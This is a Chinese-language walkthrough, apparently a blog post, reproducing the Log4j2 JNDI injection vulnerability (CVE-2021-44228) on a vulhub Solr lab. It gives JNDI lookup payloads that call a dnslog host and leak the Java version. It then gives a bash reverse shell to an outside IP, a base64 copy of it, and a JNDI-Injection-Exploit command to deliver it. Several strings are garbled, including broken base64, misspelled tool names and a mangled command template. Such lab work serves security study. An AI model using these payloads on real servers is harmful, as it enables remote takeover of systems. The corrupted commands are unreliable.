log4j2漏洞复现

1.描述

Apache Log4j2 中存在 JNDI注入漏洞，当程序将用户输入的数据进行日志记录时，即可触发此漏洞，成功利用此漏洞可以在目标服务器上执行任意代码。

通俗简单的说就是：在打印日志的时候，如果你的日志内容中包含关键词 ${，攻击者就能将关键字所包含的内容当作变量来替换成任何攻击命令，并且执行。由于 Apache Log4j2 的某些函数具有递归分析函数，因此攻击者可以直接构造恶意请求来触发远程代码执行漏洞。

${jndi:ldap://ibc23d.dnslog.cn/test}

2.影响版本

2.0 <= Apache log4j2 <= 2.14.1

3.环境搭建

cd vulhub-master/log4j/CVE-2021-44228
docker-compose up -d

4.漏洞复现

1.访问 

http://1.92.134.1:8983/solr/#/

2.访问

可以发现 /solr/admin/cores?action= 这里有个参数可以传，可以按照上面的原理先构造一个请求传过去存在JNDI注入那么Idap服务端会执行我们传上去的payload然后在DNSLOG平台上那里留下记录，我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的版本号!

这边需要http://www.dnslog.cn/

/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.aqzz6y.dnslog.cn}

http://1.92.134.1:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.aqzz6y.dnslog.cn}

收到dns请求 , 说明存在漏洞 

3.漏洞利用

开始反弹Shell准备JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!

# JDNI项目地址
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
# 反弹shell
bash -i >& /dev/tcp/101.42.118.221/8080 0>&1
# 反弹Shell-base64加密
YmFzaCAtaSA+JiAVZGV2L3RjCC8xMDEUNDIUMTE4LjIyMS84MDgWIDA+JjE=
# 命令模板
java -jar target/INDI-Injection-Exploit-1.0-SNAPSH0T-all.jar -C"bash -c{echo,[经过base64编码后的命令1}|{base64,-d}bash"-A「你的ypsipl
# 最终Payloadjava -jar JNDI-Injection-Exploit-1.0-SNAPSH0T-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAVZGV2L3RiCC8xMDEUNDIUMTE4LjIyMS84MDgWIDA+JjE=}|{base64,-d} |bash"-A 101.42.118.221

步骤五:以上可以看到有三个服务，看到熟悉的rmi和ldap，实际上这个jar的作用就是帮我们生成了恶意代码类，并且生成了对应的url，然后我们就可以回到刚才的网站去进行JNDI注入...这里在注入之前另启动一个终端开启监听..